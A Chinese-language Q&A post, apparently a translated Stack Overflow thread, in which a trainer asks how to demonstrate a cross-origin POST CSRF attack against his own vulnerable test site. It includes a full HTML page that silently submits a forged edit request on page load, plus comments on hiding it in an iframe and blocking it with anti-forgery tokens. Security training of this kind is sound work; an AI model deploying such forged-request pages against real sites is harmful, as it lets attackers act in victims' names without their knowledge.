我正在向我們企業中的其他人介紹Web安全性,並且我想展示一些示例以產生更大的影響。如何演示CSRF攻擊
爲此我創建了一個容易受到此攻擊的小型網站,該網站只能在我們的網絡上訪問。
我現在試圖利用這種攻擊,但我一個問題:
如何用POST形式做到這一點?
我沒有問題,這與GET查詢,但與POST,我試圖用JavaScript做到這一點,沒有問題,如果我託管我的代碼在同一主機上,但如果我想承載我的代碼到另一個主機是更現實的,我被阻止,因爲它是一個跨域請求。
那麼我應該如何發送這些POST變量?
謝謝!
這裏是我當前的代碼:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>CSRF attack demo</title>
<script type="text/javascript">
function getHTTPObject() {
var http = false;
//Use IE's ActiveX items to load the file.
if(typeof ActiveXObject != 'undefined') {
try {http = new ActiveXObject("Msxml2.XMLHTTP");}
catch (e) {
try {http = new ActiveXObject("Microsoft.XMLHTTP");}
catch (E) {http = false;}
}
//If ActiveX is not available, use the XMLHttpRequest of Firefox/Mozilla etc. to load the document.
} else if (window.XMLHttpRequest) {
try {http = new XMLHttpRequest();}
catch (e) {http = false;}
}
return http;
}
function post_to_url(path, params, method) {
method = method || "post"; // Set method to post by default, if not specified.
// The rest of this code assumes you are not using a library.
// It can be made less wordy if you use one.
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
for(var key in params) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
document.body.appendChild(form);
form.submit();
}
function postToUrlBackground(path, params){
var http = getHTTPObject();
http.open("POST", path, true);
//Send the proper header information along with the request
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");
http.onreadystatechange = function() {//Call a function when the state changes.
if(http.readyState == 4 && http.status == 200) {
//alert("Response received");
}
}
http.send(params);
}
function TryAttack(){
//alert("Sending");
postToUrlBackground("http://localhost:51612/Movie/Edit/1", "Title=%28500%29This+item+has+been+changed+without+any+rights&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE");
//postToUrlBackground("http://localhost:51612/Movie/Edit/1","Title=%28500%29+JOURS+ENSEMBLE&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE" );
//alert("sent");
}
</script>
</head>
<body onload="TryAttack()">
<img src=image.png />
</body>
</html>
好吧,我明白了,我們把它放在一個這樣的iframe中,用戶看不到它已被重定向? – J4N
偉大的工作:)我累積了一個iframe + htaccess :) – J4N
哇,這對我來說測試漏洞是非常有用的。如果攻擊者知道端點期望的數據,他們就會進來。由於我知道預期的表單值,因此我能夠快速證明這一點。將使用防僞令牌來阻止。非常感激。 –